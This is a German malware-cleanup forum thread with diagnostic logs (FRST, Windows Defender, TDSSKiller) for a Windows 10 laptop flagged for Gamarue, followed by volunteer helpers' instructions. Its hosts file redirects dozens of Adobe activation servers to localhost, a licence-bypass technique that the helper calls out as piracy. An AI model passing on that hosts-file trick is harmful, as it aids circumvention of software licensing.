(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ==========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2016-02-23 23:08 - 2016-07-30 18:02 - 00003191 _____ C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 activate.adobe.com
127.0.0.1 adobe.activate.com
127.0.0.1 activate.adobe.de
127.0.0.1 adobeereg.com
127.0.0.1 hl2rcv.adobe.com
127.0.0.1 3dns.adobe.com
127.0.0.1 3dns-1.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-4.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-1.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 adobe-dns-4.adobe.com
127.0.0.1 adobe-dns-5.adobe.com
127.0.0.1 activate-sea.adobe.de
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 activate-sjc0.adobe.de
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 activate.wip.adobe.com
127.0.0.1 activate.wip1.adobe.com
127.0.0.1 activate.wip2.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 activate.wip4.adobe.com
127.0.0.1 activate.wip3.adobe.de
127.0.0.1 practivate.adobe
127.0.0.1 practivate.adobe.de
127.0.0.1 practivate.adobe.com
Da befinden sich 48 zusätzliche Einträge.
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
HKLM\...\StartupApproved\StartupFolder: => "CodeMeter Control Center.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Netzwerk Server.lnk"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "NvBackend"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKLM\...\StartupApproved\Run32: => "IMSS"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{653565DE-9382-4D0D-85FF-4568B9133C1E}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [UDP Query User{628701B0-B712-431B-9393-9A95979EDCD3}C:\program files\srware iron (64-bit)\chrome.exe] => (Block) C:\program files\srware iron (64-bit)\chrome.exe
FirewallRules: [TCP Query User{F7353599-717C-48F1-A7C4-29EA353FB9EA}C:\program files\srware iron (64-bit)\chrome.exe] => (Block) C:\program files\srware iron (64-bit)\chrome.exe
FirewallRules: [{792A37F2-D689-4DD6-8D2C-FBA7331805F4}] => (Block) C:\program files\autodesk\3ds max 2015\3dsmax.exe
FirewallRules: [{B791C512-BFC4-4770-9ECA-470BCC2A7DEE}] => (Block) C:\program files\autodesk\3ds max 2015\3dsmax.exe
FirewallRules: [UDP Query User{8B73BCF1-A27F-46FA-8493-FCAEC1304E80}C:\program files\autodesk\3ds max 2015\3dsmax.exe] => (Allow) C:\program files\autodesk\3ds max 2015\3dsmax.exe
FirewallRules: [TCP Query User{89173555-CB79-4375-8B44-776AD246B48C}C:\program files\autodesk\3ds max 2015\3dsmax.exe] => (Allow) C:\program files\autodesk\3ds max 2015\3dsmax.exe
FirewallRules: [{62792125-6600-4F0D-9E98-36AFFE88A65C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{0A1FDF08-88CB-46A6-A831-2C99CBD8CB46}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{DF579F84-82D2-4D87-AE46-8C50FEEADB09}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{E5FE0167-99D3-4174-B1EC-B4885B8F4350}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [TCP Query User{2F4AFE87-B42B-45E3-B554-1995154ED7F8}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{DA37DC8E-E6FD-4F94-8205-AD8E720DF402}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe
FirewallRules: [{AA8607DB-7DDC-461E-A485-928A060249F7}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\ArchiCAD.exe
FirewallRules: [{88856880-8A4A-42AB-9D2E-30C799D2B9F1}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\ArchiCAD.exe
FirewallRules: [{39C35EB4-AA50-466F-A4BF-3C59A7E3BA8C}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\CineRender\CineRender 64bit.exe
FirewallRules: [{7926FF23-E4D1-454F-B88A-87D18A9AB988}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\CineRender\CineRender 64bit.exe
FirewallRules: [{E9100150-1A9E-4657-BC50-714390476085}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [{9CEAA83C-8F23-4BDB-BAFF-C8C84FEE4D81}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [{CC90D6FE-8983-4889-9794-A14326787265}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [TCP Query User{FB492D07-7354-45CC-ADD9-E6AE207F9190}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{CCD8C032-9093-4911-BCD8-02465C75B061}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe
FirewallRules: [{EA429A43-2FEC-4D6F-826C-06F17CCC0613}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe
FirewallRules: [{20E60939-1FF9-49B8-A516-9542A3F2C33E}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe
FirewallRules: [{28C60E63-767D-4518-A3D4-6123F4316D49}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe
FirewallRules: [{9BF832A9-551A-4DF6-99CA-5002606D4197}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe
FirewallRules: [{2D2FEEFE-0D55-4D31-BC23-46F39EBD0F58}] => (Allow) C:\Program Files\Chaos Group\V-Ray\3dsmax 2015 for x64\vrlservice.exe
FirewallRules: [{6353C606-2B4C-4737-BF11-4B5E18EBAF06}] => (Allow) C:\Program Files\Chaos Group\V-Ray\3dsmax 2015 for x64\vrlservice.exe
FirewallRules: [TCP Query User{E451C298-1596-4AD5-A4EE-B7F4F17C1071}C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe] => (Block) C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{5D6F2A66-AF06-4682-A369-62305BA12C39}C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe] => (Block) C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [TCP Query User{1ACF387C-2C3D-49B0-B24B-F58F47F86A71}C:\program files\graphisoft\archicad 18\archicad.exe] => (Block) C:\program files\graphisoft\archicad 18\archicad.exe
FirewallRules: [UDP Query User{5CF615D2-8196-4AEF-9F97-12FED9AA7D13}C:\program files\graphisoft\archicad 18\archicad.exe] => (Block) C:\program files\graphisoft\archicad 18\archicad.exe
FirewallRules: [{1D081E8A-DD53-4FDB-B585-23585FFA1137}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{65AAA8A3-F502-43D1-8931-540CB11FCF00}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
==================== Wiederherstellungspunkte =========================
14-06-2017 20:31:05 Windows Update
20-06-2017 21:19:32 Windows Update
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (06/29/2017 10:07:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: WSCommCntr4.exe, Version: 4.0.3.0, Zeitstempel: 0x52e23951
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.0, Zeitstempel: 0xb79b6ddb
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000003bbef
ID des fehlerhaften Prozesses: 0xa2c
Startzeit der fehlerhaften Anwendung: 0x01d2f1135d2f73eb
Pfad der fehlerhaften Anwendung: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\Lib\WSCommCntr4.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: bd38a6ca-5ed4-42f0-be88-1ecd6890a6e2
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (06/28/2017 07:04:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: MsMpEng.exe, Version: 4.11.15063.0, Zeitstempel: 0x418969b3
Name des fehlerhaften Moduls: offreg.dll_unloaded, Version: 10.0.15063.168, Zeitstempel: 0xfaed1333
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000001440
ID des fehlerhaften Prozesses: 0x1088
Startzeit der fehlerhaften Anwendung: 0x01d2e54a788d7120
Pfad der fehlerhaften Anwendung: C:\Program Files\Windows Defender\MsMpEng.exe
Pfad des fehlerhaften Moduls: offreg.dll
Berichtskennung: 0a8d723a-7e31-4589-8105-733ccd81828d
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (06/27/2017 09:01:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: WSCommCntr4.exe, Version: 4.0.3.0, Zeitstempel: 0x52e23951
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.0, Zeitstempel: 0xb79b6ddb
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000001445d
ID des fehlerhaften Prozesses: 0x2f0
Startzeit der fehlerhaften Anwendung: 0x01d2ef77c053cd42
Pfad der fehlerhaften Anwendung: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\Lib\WSCommCntr4.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: 903741eb-1643-4d3e-8a22-1f471438ecab
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (06/15/2017 07:05:58 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook)
Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2144927148. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.
Error: (06/14/2017 10:09:53 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook)
Description: Bei der Aktivierung der App „E046963F.LenovoCompanion_k1h2ywk1493x8!App“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.
Error: (06/14/2017 08:33:49 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.
Error: (06/14/2017 08:21:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook)
Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2144927148. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.
Error: (06/12/2017 09:55:52 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook)
Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2147023170. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.
Error: (06/12/2017 09:55:52 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook)
Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2144927148. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.
Error: (06/08/2017 09:08:30 AM) (Source: MSDTC Client 2) (EventID: 4104) (User: )
Description: Fehler beim Abrufen des Status des Clusterknotens: .Zurückgegebener Fehlercode: 0x8007085A
Systemfehler:
=============
Error: (07/02/2017 08:56:05 PM) (Source: Disk) (EventID: 11) (User: )
Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden.
Error: (07/02/2017 08:18:09 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/02/2017 08:18:09 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/02/2017 08:17:58 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.
Error: (07/02/2017 08:17:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet:
Die Anforderung wird nicht unterstützt.
Error: (07/02/2017 07:50:03 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/02/2017 07:50:03 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/02/2017 07:50:00 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.
Error: (07/02/2017 07:49:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet:
Die Anforderung wird nicht unterstützt.
Error: (07/02/2017 07:42:23 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
CodeIntegrity:
===================================
Date: 2017-06-28 19:04:24.848
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-06-28 19:04:24.794
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-06-18 19:26:08.764
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-06-13 08:51:15.282
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i7-5500U CPU @ 2.40GHz
Prozentuale Nutzung des RAM: 19%
Installierter physikalischer RAM: 16079.95 MB
Verfügbarer physikalischer RAM: 12941.73 MB
Summe virtueller Speicher: 32463.95 MB
Verfügbarer virtueller Speicher: 29419.4 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:236.7 GB) (Free:75.98 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 5346E13D)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=236.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=889 MB) - (Type=27)
==================== Ende von Addition.txt ============================
Code:
ATTFilter Ebene Datum und Uhrzeit Quelle Ereignis-ID Aufgabenkategorie
Warnung 02.07.2017 20:19:09 Microsoft-Windows-Windows Defender 1116 Keine "Von Windows Defender Antivirus wurde Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/Gamarue.gen!A&threatid=2147687831&enterprise=0
Name: Behavior:Win32/Gamarue.gen!A
ID: 2147687831
Schweregrad: Schwerwiegend
Kategorie: Verdächtiges Verhalten
Pfad: behavior:_pid:9480:52449625702704;process:_pid:9480,ProcessStart:131434931121431956
Erkennungsursprung: Unbekannt
Erkennungstyp: Konkret
Erkennungsquelle: Unbekannt
Benutzer:
Prozessname: C:\Windows\SysWOW64\msiexec.exe
Signaturversion: AV: 1.247.404.0, AS: 1.247.404.0, NIS: 117.2.0.0
Modulversion: AM: 1.1.13903.0, NIS: 2.1.13804.0"
Code:
ATTFilter Ebene Datum und Uhrzeit Quelle Ereignis-ID Aufgabenkategorie
Informationen 02.07.2017 20:19:10 Microsoft-Windows-Windows Defender 1117 Keine "Von Windows Defender Antivirus wurden Maßnahmen ergriffen, um den Computer vor Schadsoftware oder anderer potenziell unerwünschter Software zu schützen.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/Gamarue.gen!A&threatid=2147687831&enterprise=0
Name: Behavior:Win32/Gamarue.gen!A
ID: 2147687831
Schweregrad: Schwerwiegend
Kategorie: Verdächtiges Verhalten
Pfad: behavior:_pid:9480:52449625702704;process:_pid:9480,ProcessStart:131434931121431956
Erkennungsursprung: Unbekannt
Erkennungstyp: Konkret
Erkennungsquelle: Unbekannt
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: C:\Windows\SysWOW64\msiexec.exe
Aktion: Quarantäne
Aktionsstatus: Starten Sie das Gerät neu, um das Entfernen von Schadsoftware und anderer potenziell unerwünschter Software abzuschließen.
Fehlercode: 0x00000000
Fehlerbeschreibung: Der Vorgang wurde erfolgreich beendet.
Signaturversion: AV: 1.247.404.0, AS: 1.247.404.0, NIS: 117.2.0.0
Modulversion: AM: 1.1.13903.0, NIS: 2.1.13804.0"
Code:
ATTFilter Ebene Datum und Uhrzeit Quelle Ereignis-ID Aufgabenkategorie
Informationen 02.07.2017 20:20:00 Microsoft-Windows-Windows Defender 1001 Keine "Die Windows Defender Antivirus-Überprüfung wurde fertig gestellt.
Überprüfungs-ID: {21DA05A8-757D-4A97-B967-2101EC459B50}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: ararat-notebook\ararat
Überprüfungszeit: 0:01:14"
|
|
03.07.2017, 08:47
| #4 |
| /// TB-Senior    | Windows 10 - Gamarue Ich habe dein Thema in Arbeit und melde mich so schnell als möglich mit weiteren Anweisungen. Bitte beachte, dass alle meine Antworten zuerst von einem Ausbilder freigegeben werden müssen, bevor ich diese hier posten darf. Dies garantiert, dass Du Hilfe von einem ausgebildeten Helfer bekommst. Ich bedanke mich für deine Geduld 
__________________ Zum Schutz vor Trojanerinnen und Femaleware ist bei einem aktuellen Windows 10 die Windows-Defenderin ausreichend. |
|
03.07.2017, 16:20
| #5 |
| | Windows 10 - Gamarue Hey Fragerin, danke für deine Antwort. Kann ich mein Notebook weiterbenutzen oder sollte ich den erstmal nur dann berühren um Scanner etc. laufen zu lassen und entsprechende Logs zu posten? Gruß |
|
03.07.2017, 17:53
| #6 |
| /// TB-Senior | Windows 10 - Gamarue Ich riskiere hier mal ohne Anweisung, zu antworten, dass du das Notebook, wenn es geht, lieber nicht normal benutzen solltest (besonders online) und auch keine Wechseldatenträger anstecken, die noch nicht dran waren.
__________________ --> Windows 10 - Gamarue |
|
03.07.2017, 18:24
| #7 |
| /// TB-Senior | Windows 10 - GamarueMein Name ist Ruth und ich werde dir bei der Bereinigung deines Systems helfen. 
Schritt 1: Illegale Software entfernen In unserem Forum werden nur komplett legale Systeme bereinigt, weil alles andere eine Beihilfe zu illegalen Handlungen wäre und außerdem Cracks etc. eine Malwarequelle sind. Deinstalliere daher bitte zunächst alle kostenpflichtigen Adobe-Produkte, die du ohne Bezahlung und Aktivierung auf deinem System betreibst. Erst danach können wir weitermachen. Und wieso hast du eine PRO-Version von Windows? Ist das bezahlt?
__________________ Zum Schutz vor Trojanerinnen und Femaleware ist bei einem aktuellen Windows 10 die Windows-Defenderin ausreichend. |
|
03.07.2017, 20:29
| #8 |
| | Windows 10 - Gamarue Hallo Ruth, danke für deine Antwort. Habe alles verstanden und ist selbstverständlich nachvollziehbar - Software ist entfernt. Habe mir Win 7 Pro gekauft, um dann rechtzeitig kostenlos auf Win 10 upzugraden, ist also bezahlt und alles legal. Gruß, Ararat |
|
04.07.2017, 20:14
| #9 |
| /// TB-Senior | Windows 10 - Gamarue Schritt 1: Suche nach eventuellen Rootkits Downloade dir bitte  TDSSKiller.exe und speichere diese Datei auf dem Desktop
Schritt 2: Dateiinfo mit FRST
Schritt 3: neue FRST-Logs
__________________ Zum Schutz vor Trojanerinnen und Femaleware ist bei einem aktuellen Windows 10 die Windows-Defenderin ausreichend. |
|
04.07.2017, 20:49
| #10 |
| | Windows 10 - Gamarue Hallo Ruth, danke für deine Antwort. Schritt 1: Code:
ATTFilter 21:35:13.0914 0x03b4 TDSS rootkit removing tool 3.1.0.15 Apr 18 2017 11:34:02
21:35:32.0713 0x03b4 ============================================================
21:35:32.0713 0x03b4 Current date / time: 2017/07/04 21:35:32.0713
21:35:32.0713 0x03b4 SystemInfo:
21:35:32.0713 0x03b4
21:35:32.0713 0x03b4 OS Version: 10.0.15063 ServicePack: 0.0
21:35:32.0713 0x03b4 Product type: Workstation
21:35:32.0713 0x03b4 ComputerName: ARARAT-NOTEBOOK
21:35:32.0713 0x03b4 UserName: ararat
21:35:32.0713 0x03b4 Windows directory: C:\WINDOWS
21:35:32.0713 0x03b4 System windows directory: C:\WINDOWS
21:35:32.0713 0x03b4 Running under WOW64
21:35:32.0713 0x03b4 Processor architecture: Intel x64
21:35:32.0713 0x03b4 Number of processors: 4
21:35:32.0713 0x03b4 Page size: 0x1000
21:35:32.0713 0x03b4 Boot type: Normal boot
21:35:32.0713 0x03b4 CodeIntegrityOptions = 0x00000001
21:35:32.0713 0x03b4 ============================================================
21:35:32.0792 0x03b4 KLMD registered as C:\WINDOWS\system32\drivers\63444692.sys
21:35:32.0792 0x03b4 KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 15063.0, osProperties = 0x19
21:35:33.0620 0x03b4 System UUID: {8A6B71B3-A5AA-3998-4220-AD0D10461FEE}
21:35:34.0198 0x03b4 Drive \Device\Harddisk0\DR0 - Size: 0x3B9E656000 ( 238.47 Gb ), SectorSize: 0x200, Cylinders: 0x799A, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:35:34.0198 0x03b4 ============================================================
21:35:34.0198 0x03b4 \Device\Harddisk0\DR0:
21:35:34.0198 0x03b4 MBR partitions:
21:35:34.0198 0x03b4 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
21:35:34.0198 0x03b4 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0x1D9650BA
21:35:34.0198 0x03b4 ============================================================
21:35:34.0198 0x03b4 C: <-> \Device\Harddisk0\DR0\Partition2
21:35:34.0198 0x03b4 ============================================================
21:35:34.0198 0x03b4 Initialize success
21:35:34.0198 0x03b4 ============================================================
21:36:49.0569 0x1ac0 ============================================================
21:36:49.0569 0x1ac0 Scan started
21:36:49.0569 0x1ac0 Mode: Manual; SigCheck; TDLFS;
21:36:49.0569 0x1ac0 ============================================================
21:36:49.0569 0x1ac0 KSN ping started
21:37:09.0645 0x1ac0 KSN ping finished: true
21:37:10.0114 0x1ac0 ================ Scan system memory ========================
21:37:10.0114 0x1ac0 System memory - ok
21:37:10.0114 0x1ac0 ================ Scan services =============================
21:37:10.0177 0x1ac0 [ AAB860A5E606B9621E130D8C29D3F305, 93466620433B27F3BCFECDA26DD420AD1E5219034BA3B4E930EDED6D6728AE5C ] 1394ohci C:\WINDOWS\System32\drivers\1394ohci.sys
